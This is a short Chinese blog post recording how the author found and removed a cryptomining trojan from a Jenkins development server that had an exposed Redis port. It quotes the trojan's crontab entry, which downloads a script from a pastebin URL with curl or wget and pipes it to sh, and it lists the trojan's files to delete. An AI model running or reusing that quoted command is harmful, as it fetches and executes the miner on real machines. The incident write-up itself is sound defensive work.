服务器cpu飙高-挖矿木马解决方案记录

起因:前几天,开发服务器的Jenkins服务一直会出现偶然性的失败,编译代码的线程经常性被kill掉,需要启动好几次才有机会成功。给开发带来诸多不便。受不了啦,于是在一个午饭时间,决定要彻底搞清楚这个问题。

解决问题
首先使用top命令,查看cpu占用。不看不知道啊,看了吓一跳!cpu占用一直在98-100%之间,但是却看不到占用大量内存的进程,此时感觉到问题应该是被木马入侵了。
于是crontab-l看了一下,果然有一个没见过的定时任务。

*/23 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh

凭直觉,在搜索了下1NtRkBc3,果不其然,我并不是天选之子啊。赶紧看看前人的处理方式,总结如下:
1.删除掉上面的定时任务
2.删除掉以下文件

/etc/cron*
/var/spool/cron/root
/usr/local/lib/libdns.so
/etc/ld.so.preload
/bin/dns
/usr/sbin/netdns
/etc/init.d/netdns( /etc/rc.d/init.d/netdns)
/tmp目录下的陌生文件

3.再使用top命令,找到占用大量进程的进程,并kill掉
注:删文件之前,保险起见可以先做一下备份,避免出现误删
一定要将文件都删除赶紧之后再删除进程,因为进程有做相互唤醒,先除根再扫叶

本次出现被挖矿木马植入的原因,应该是前段时间redis的端口有对外网放开过,大家一定要记得redis端口仅内外访问或者做加固,不然费力有费心,还费电!

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值